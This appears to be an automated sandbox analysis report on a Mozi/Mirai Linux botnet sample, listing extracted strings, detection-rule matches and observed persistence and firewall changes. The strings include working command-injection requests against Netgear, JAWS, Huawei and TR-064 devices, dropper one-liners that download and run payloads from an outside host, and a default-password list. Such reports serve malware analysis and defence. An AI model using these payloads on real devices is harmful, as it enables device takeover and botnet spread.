                            Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                            Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                            Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                            Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                            Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                            Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                            Source: Initial sampleString containing potential weak password found: admin
                            Source: Initial sampleString containing potential weak password found: default
                            Source: Initial sampleString containing potential weak password found: support
                            Source: Initial sampleString containing potential weak password found: service
                            Source: Initial sampleString containing potential weak password found: supervisor
                            Source: Initial sampleString containing potential weak password found: guest
                            Source: Initial sampleString containing potential weak password found: administrator
                            Source: Initial sampleString containing potential weak password found: 123456
                            Source: Initial sampleString containing potential weak password found: 54321
                            Source: Initial sampleString containing potential weak password found: password
                            Source: Initial sampleString containing potential weak password found: 12345
                            Source: Initial sampleString containing potential weak password found: admin1234
                            Source: Initial samplePotential command found: GET /c HTTP/1.0
                            Source: Initial samplePotential command found: GET %s HTTP/1.1
                            Source: Initial samplePotential command found: GET /c
                            Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                            Source: Initial samplePotential command found: GET /%s HTTP/1.1
                            Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                            Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                            Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                            Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/486@73/0

                            Persistence and Installation Behavior

                            barindex
                            Source: /bin/sh (PID: 6286)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6300)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6305)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6311)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6317)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6320)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6323)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6333)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6342)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6373)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6376)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6382)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6388)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6394)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6400)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6406)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6412)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6418)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6423)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6430)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6436)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6456)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6459)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6462)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6465)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6468)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6474)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /proc/6230/mountsJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/im-config_wayland.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/gawk.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/01-locale-fix.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/apps-bin-path.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/Z99-cloudinit-warnings.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/vte-2.91.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/Z97-byobu.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/Z99-cloud-locale-test.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/xdg_dirs_desktop_session.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/profile.d/bash_completion.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/rcS.d/S95baby.shJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /bin/sh (PID: 6240)Killall command executed: killall -9 telnetd utelnetd scfgmgrJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6226)File: /tmp/.ipsJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //run/speech-dispatcher/.cacheJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //home/saturnino/.mozillaJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //home/saturnino/.cacheJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //home/saturnino/.gnupgJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //home/saturnino/.configJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //home/saturnino/.localJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //etc/.javaJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //etc/.java/.systemPrefsJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Directory: //etc/skel/.configJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6264)Directory: /tmp/.configJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6272)Directory: /tmp/.configJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6276)Directory: /tmp/.ipsJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6276)Directory: /tmp/.configJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6282)Directory: /tmp/.configJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6226)Empty hidden file: /tmp/.ipsJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/6230/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/6232/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1582/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/3088/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/230/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/110/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/231/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/111/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/232/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1579/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/112/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/233/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1699/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/113/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/234/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1335/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1698/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/114/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/235/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1334/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1576/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/2302/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/115/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/236/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/116/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/237/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/117/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/118/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/910/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/119/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/6226/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/912/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/10/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/2307/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/11/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/918/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/12/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/13/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/6243/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/14/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/6242/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/15/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/16/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/17/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/18/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1594/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/120/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/121/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1349/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/122/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/243/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/123/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/2/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/124/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/3/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/4/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/125/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/126/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1344/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1465/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1586/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/127/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/6/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/248/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/128/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/249/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1463/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/800/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/6238/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/9/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/801/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/20/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/21/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/1900/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/22/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/23/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/24/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/25/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/26/statJump to behavior
                            Source: /usr/bin/killall (PID: 6240)File opened: /proc/27/statJump to behavior
